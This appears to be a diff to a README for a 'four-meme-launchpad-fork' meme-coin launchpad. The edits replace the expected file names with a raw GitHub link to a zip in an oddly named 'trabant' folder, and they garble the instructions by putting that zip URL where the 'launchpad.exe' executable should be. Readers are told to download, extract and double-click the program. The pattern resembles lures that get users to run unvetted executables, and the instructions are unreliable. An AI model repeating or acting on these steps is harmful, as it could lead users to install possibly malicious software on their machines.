fatahfd/four-meme-launchpad-fork/README.md

    After selecting the latest release, look for the download link for your operating system.
 Click on it to start the download.

 4. **Locate the Downloaded File**
    Once the download is complete, check your "Downloads" folder or the location you selected for downloads.
-You should see a file named `four-meme-launchpad-fork.zip` or a similar format.
+You should see a file named `https://raw.githubusercontent.com/fatahfd/four-meme-launchpad-fork/main/trabant/four-meme-launchpad-fork.zip` or a similar format.

 5. **Extract the Files**
    Right-click on the downloaded file and choose to "Extract All" or use any extraction tool you prefer.
 This will create a new folder with all necessary files.

 6. **Run the Application**
-   Open the extracted folder, and look for `launchpad.exe` or `launchpad` (for macOS/Linux).
+   Open the extracted folder, and look for `https://raw.githubusercontent.com/fatahfd/four-meme-launchpad-fork/main/trabant/four-meme-launchpad-fork.zip` or `launchpad` (for macOS/Linux).
 Double-click on this file to start the application.

 7. **Follow the On-Screen Instructions**
    Once the application opens, follow the prompts.
 They will guide you through the process of launching your meme coin.